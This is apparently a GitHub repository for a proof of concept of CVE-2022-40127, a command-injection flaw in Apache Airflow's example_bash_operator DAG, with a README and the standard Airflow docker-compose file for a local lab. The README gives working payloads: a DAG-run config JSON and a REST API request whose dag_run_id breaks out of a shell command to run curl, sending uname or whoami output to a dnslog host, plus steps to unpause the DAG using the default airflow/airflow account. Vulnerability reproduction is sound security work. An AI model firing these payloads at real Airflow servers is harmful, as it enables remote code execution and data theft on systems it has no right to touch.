├── README.md
└── docker-compose.yaml
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-40127
2 | RCE in the `example_bash_operator` example DAG of Apache Airflow < 2.4.0 (command injection via attacker-supplied DAG-run parameters).
3 |
4 | # PoC Docker environment
5 |
6 | ```
7 | mkdir CVE-2022-40127 && cd CVE-2022-40127
8 | curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
9 | # or: wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yaml
10 | mkdir -p ./dags ./logs ./plugins
11 | echo -e "AIRFLOW_UID=$(id -u)" > .env
12 | docker-compose up airflow-init
13 | docker-compose up -d
14 | # wait a minute or two for the containers to become healthy
15 | open http://localhost:8080
16 | ```
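
Once the stack is healthy, the web UI and REST API listen on port 8080 with the default `airflow`/`airflow` account created by `airflow-init` (see the compose file below). A quick sanity check using standard Airflow 2.x endpoints; the `PATCH` unpauses `example_bash_operator` so a triggered run actually executes:

```
# confirm the webserver is up
curl -s http://localhost:8080/health

# unpause the example DAG so injected runs are scheduled and executed
# (credentials are the compose-file defaults: airflow / airflow)
curl -s -X PATCH -u 'airflow:airflow' \
  -H 'Content-Type: application/json' \
  'http://localhost:8080/api/v1/dags/example_bash_operator' \
  -d '{"is_paused": false}'
```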
17 |
18 | # POC 1 (web UI)
19 |
20 | Trigger the `example_bash_operator` DAG from the web UI (Trigger DAG w/ config) and supply the following JSON as the run configuration:
21 |
22 | ```
23 | {"fxoxx":"\";curl `uname`.lxx2.535ld4zn.dnslog.pw;\""}
24 | ```
25 |
26 |
27 |
28 | ## dnslog result
29 |
30 | A DNS lookup carrying the output of `uname` shows up on the dnslog panel, confirming that the injected command executed.
31 |
32 |
33 | # POC 2 (REST API)
34 | Trigger the DAG run through the REST API, injecting the command via the `dag_run_id` field (with this compose file the API uses basic auth; the default account is `airflow`/`airflow`):
35 | ```
36 | curl -X 'POST' \
37 | 'http://10.11.12.131:8080/api/v1/dags/example_bash_operator/dagRuns' \
38 | -u 'airflow:airflow' -H 'accept: application/json' \
39 | -H 'Content-Type: application/json' \
40 | -d '{
41 | "conf": {
42 | "dag_run": "api2"
43 | },
44 | "dag_run_id": "id \"&& curl `whoami`.api222.535ld4zn.dnslog.pw",
45 | "logical_date": "2022-11-19T10:13:13.920Z"
46 |
47 | }'
48 | ```
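
Besides the DNS callback, execution can be verified locally: list the DAG runs through the standard API and grep the task logs, which the compose file mounts at `./logs` (the rendered bash command, including the injected `curl`, ends up there):

```
# confirm the malicious run was created
curl -s -u 'airflow:airflow' \
  'http://localhost:8080/api/v1/dags/example_bash_operator/dagRuns?limit=5&order_by=-execution_date'

# the rendered command with the injected curl shows up in the mounted task logs
grep -ri dnslog ./logs | head
```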
49 |
50 | API documentation for the dagRuns endpoint (local instance):
51 |
52 | - ReDoc: http://localhost:8080/redoc#tag/DAGRun/operation/post_dag_run
53 | - Swagger UI: http://localhost:8080/api/v1/ui/#/DAGRun/post_dag_run
54 |
55 |
56 |
57 |
58 | ## dnslog result
59 |
60 | A DNS lookup carrying the output of `whoami` shows up on the dnslog panel, confirming that the injected `dag_run_id` was executed as part of a shell command.
61 |
62 |
63 | Fix commit:
64 |
65 | https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a
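
For context, before this patch `example_bash_operator` templated DAG-run fields straight into a `BashOperator` command, roughly as sketched below (reconstructed for illustration; the exact template is in the diff above). The double quote inside the injected `dag_run_id` from POC 2 terminates the quoted `echo` argument and `&&` chains the attacker-supplied `curl`, which runs on the worker when the task executes.

```
# approximate pre-fix bash_command template in the example DAG (see the diff for the real code)
echo "run_id={{ run_id }} | dag_run={{ dag_run }}"
```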
66 |
67 | Links:
68 |
69 | https://stackoverflow.com/questions/67110383/how-to-trigger-airflow-dag-with-rest-api-i-get-property-is-read-only-state
70 |
--------------------------------------------------------------------------------
/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | # Licensed to the Apache Software Foundation (ASF) under one
2 | # or more contributor license agreements. See the NOTICE file
3 | # distributed with this work for additional information
4 | # regarding copyright ownership. The ASF licenses this file
5 | # to you under the Apache License, Version 2.0 (the
6 | # "License"); you may not use this file except in compliance
7 | # with the License. You may obtain a copy of the License at
8 | #
9 | # http://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing,
12 | # software distributed under the License is distributed on an
13 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
14 | # KIND, either express or implied. See the License for the
15 | # specific language governing permissions and limitations
16 | # under the License.
17 | #
18 |
19 | # Basic Airflow cluster configuration for CeleryExecutor with Redis and PostgreSQL.
20 | #
21 | # WARNING: This configuration is for local development. Do not use it in a production deployment.
22 | #
23 | # This configuration supports basic configuration using environment variables or an .env file
24 | # The following variables are supported:
25 | #
26 | # AIRFLOW_IMAGE_NAME - Docker image name used to run Airflow.
27 | # Default: apache/airflow:2.3.4
28 | # AIRFLOW_UID - User ID in Airflow containers
29 | # Default: 50000
30 | # Those configurations are useful mostly in case of standalone testing/running Airflow in test/try-out mode
31 | #
32 | # _AIRFLOW_WWW_USER_USERNAME - Username for the administrator account (if requested).
33 | # Default: airflow
34 | # _AIRFLOW_WWW_USER_PASSWORD - Password for the administrator account (if requested).
35 | # Default: airflow
36 | # _PIP_ADDITIONAL_REQUIREMENTS - Additional PIP requirements to add when starting all containers.
37 | # Default: ''
38 | #
39 | # Feel free to modify this file to suit your needs.
40 | ---
41 | version: '3'
42 | x-airflow-common:
43 | &airflow-common
44 | # In order to add custom dependencies or upgrade provider packages you can use your extended image.
45 | # Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
46 | # and uncomment the "build" line below, Then run `docker-compose build` to build the images.
47 | image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.3.4}
48 | # build: .
49 | environment:
50 | &airflow-common-env
51 | AIRFLOW__CORE__EXECUTOR: CeleryExecutor
52 | AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
53 | # For backward compatibility, with Airflow <2.3
54 | AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
55 | AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
56 | AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
57 | AIRFLOW__CORE__FERNET_KEY: ''
58 | AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
59 | AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
60 | AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
61 | _PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
62 | volumes:
63 | - ./dags:/opt/airflow/dags
64 | - ./logs:/opt/airflow/logs
65 | - ./plugins:/opt/airflow/plugins
66 | user: "${AIRFLOW_UID:-50000}:0"
67 | depends_on:
68 | &airflow-common-depends-on
69 | redis:
70 | condition: service_healthy
71 | postgres:
72 | condition: service_healthy
73 |
74 | services:
75 | postgres:
76 | image: postgres:13
77 | environment:
78 | POSTGRES_USER: airflow
79 | POSTGRES_PASSWORD: airflow
80 | POSTGRES_DB: airflow
81 | volumes:
82 | - postgres-db-volume:/var/lib/postgresql/data
83 | healthcheck:
84 | test: ["CMD", "pg_isready", "-U", "airflow"]
85 | interval: 5s
86 | retries: 5
87 | restart: always
88 |
89 | redis:
90 | image: redis:latest
91 | expose:
92 | - 6379
93 | healthcheck:
94 | test: ["CMD", "redis-cli", "ping"]
95 | interval: 5s
96 | timeout: 30s
97 | retries: 50
98 | restart: always
99 |
100 | airflow-webserver:
101 | <<: *airflow-common
102 | command: webserver
103 | ports:
104 | - 8080:8080
105 | healthcheck:
106 | test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
107 | interval: 10s
108 | timeout: 10s
109 | retries: 5
110 | restart: always
111 | depends_on:
112 | <<: *airflow-common-depends-on
113 | airflow-init:
114 | condition: service_completed_successfully
115 |
116 | airflow-scheduler:
117 | <<: *airflow-common
118 | command: scheduler
119 | healthcheck:
120 | test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
121 | interval: 10s
122 | timeout: 10s
123 | retries: 5
124 | restart: always
125 | depends_on:
126 | <<: *airflow-common-depends-on
127 | airflow-init:
128 | condition: service_completed_successfully
129 |
130 | airflow-worker:
131 | <<: *airflow-common
132 | command: celery worker
133 | healthcheck:
134 | test:
135 | - "CMD-SHELL"
136 | - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
137 | interval: 10s
138 | timeout: 10s
139 | retries: 5
140 | environment:
141 | <<: *airflow-common-env
142 | # Required to handle warm shutdown of the celery workers properly
143 | # See https://airflow.apache.org/docs/docker-stack/entrypoint.html#signal-propagation
144 | DUMB_INIT_SETSID: "0"
145 | restart: always
146 | depends_on:
147 | <<: *airflow-common-depends-on
148 | airflow-init:
149 | condition: service_completed_successfully
150 |
151 | airflow-triggerer:
152 | <<: *airflow-common
153 | command: triggerer
154 | healthcheck:
155 | test: ["CMD-SHELL", 'airflow jobs check --job-type TriggererJob --hostname "$${HOSTNAME}"']
156 | interval: 10s
157 | timeout: 10s
158 | retries: 5
159 | restart: always
160 | depends_on:
161 | <<: *airflow-common-depends-on
162 | airflow-init:
163 | condition: service_completed_successfully
164 |
165 | airflow-init:
166 | <<: *airflow-common
167 | entrypoint: /bin/bash
168 | # yamllint disable rule:line-length
169 | command:
170 | - -c
171 | - |
172 | function ver() {
173 | printf "%04d%04d%04d%04d" $${1//./ }
174 | }
175 | airflow_version=$$(AIRFLOW__LOGGING__LOGGING_LEVEL=INFO && gosu airflow airflow version)
176 | airflow_version_comparable=$$(ver $${airflow_version})
177 | min_airflow_version=2.2.0
178 | min_airflow_version_comparable=$$(ver $${min_airflow_version})
179 | if (( airflow_version_comparable < min_airflow_version_comparable )); then
180 | echo
181 | echo -e "\033[1;31mERROR!!!: Too old Airflow version $${airflow_version}!\e[0m"
182 | echo "The minimum Airflow version supported: $${min_airflow_version}. Only use this or higher!"
183 | echo
184 | exit 1
185 | fi
186 | if [[ -z "${AIRFLOW_UID}" ]]; then
187 | echo
188 | echo -e "\033[1;33mWARNING!!!: AIRFLOW_UID not set!\e[0m"
189 | echo "If you are on Linux, you SHOULD follow the instructions below to set "
190 | echo "AIRFLOW_UID environment variable, otherwise files will be owned by root."
191 | echo "For other operating systems you can get rid of the warning with manually created .env file:"
192 | echo " See: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html#setting-the-right-airflow-user"
193 | echo
194 | fi
195 | one_meg=1048576
196 | mem_available=$$(($$(getconf _PHYS_PAGES) * $$(getconf PAGE_SIZE) / one_meg))
197 | cpus_available=$$(grep -cE 'cpu[0-9]+' /proc/stat)
198 | disk_available=$$(df / | tail -1 | awk '{print $$4}')
199 | warning_resources="false"
200 | if (( mem_available < 4000 )) ; then
201 | echo
202 | echo -e "\033[1;33mWARNING!!!: Not enough memory available for Docker.\e[0m"
203 | echo "At least 4GB of memory required. You have $$(numfmt --to iec $$((mem_available * one_meg)))"
204 | echo
205 | warning_resources="true"
206 | fi
207 | if (( cpus_available < 2 )); then
208 | echo
209 | echo -e "\033[1;33mWARNING!!!: Not enough CPUS available for Docker.\e[0m"
210 | echo "At least 2 CPUs recommended. You have $${cpus_available}"
211 | echo
212 | warning_resources="true"
213 | fi
214 | if (( disk_available < one_meg * 10 )); then
215 | echo
216 | echo -e "\033[1;33mWARNING!!!: Not enough Disk space available for Docker.\e[0m"
217 | echo "At least 10 GBs recommended. You have $$(numfmt --to iec $$((disk_available * 1024 )))"
218 | echo
219 | warning_resources="true"
220 | fi
221 | if [[ $${warning_resources} == "true" ]]; then
222 | echo
223 | echo -e "\033[1;33mWARNING!!!: You have not enough resources to run Airflow (see above)!\e[0m"
224 | echo "Please follow the instructions to increase amount of resources available:"
225 | echo " https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html#before-you-begin"
226 | echo
227 | fi
228 | mkdir -p /sources/logs /sources/dags /sources/plugins
229 | chown -R "${AIRFLOW_UID}:0" /sources/{logs,dags,plugins}
230 | exec /entrypoint airflow version
231 | # yamllint enable rule:line-length
232 | environment:
233 | <<: *airflow-common-env
234 | _AIRFLOW_DB_UPGRADE: 'true'
235 | _AIRFLOW_WWW_USER_CREATE: 'true'
236 | _AIRFLOW_WWW_USER_USERNAME: ${_AIRFLOW_WWW_USER_USERNAME:-airflow}
237 | _AIRFLOW_WWW_USER_PASSWORD: ${_AIRFLOW_WWW_USER_PASSWORD:-airflow}
238 | _PIP_ADDITIONAL_REQUIREMENTS: ''
239 | user: "0:0"
240 | volumes:
241 | - .:/sources
242 |
243 | airflow-cli:
244 | <<: *airflow-common
245 | profiles:
246 | - debug
247 | environment:
248 | <<: *airflow-common-env
249 | CONNECTION_CHECK_MAX_COUNT: "0"
250 | # Workaround for entrypoint issue. See: https://github.com/apache/airflow/issues/16252
251 | command:
252 | - bash
253 | - -c
254 | - airflow
255 |
256 | # You can enable flower by adding "--profile flower" option e.g. docker-compose --profile flower up
257 | # or by explicitly targeted on the command line e.g. docker-compose up flower.
258 | # See: https://docs.docker.com/compose/profiles/
259 | flower:
260 | <<: *airflow-common
261 | command: celery flower
262 | profiles:
263 | - flower
264 | ports:
265 | - 5555:5555
266 | healthcheck:
267 | test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
268 | interval: 10s
269 | timeout: 10s
270 | retries: 5
271 | restart: always
272 | depends_on:
273 | <<: *airflow-common-depends-on
274 | airflow-init:
275 | condition: service_completed_successfully
276 |
277 | volumes:
278 | postgres-db-volume:
279 |
--------------------------------------------------------------------------------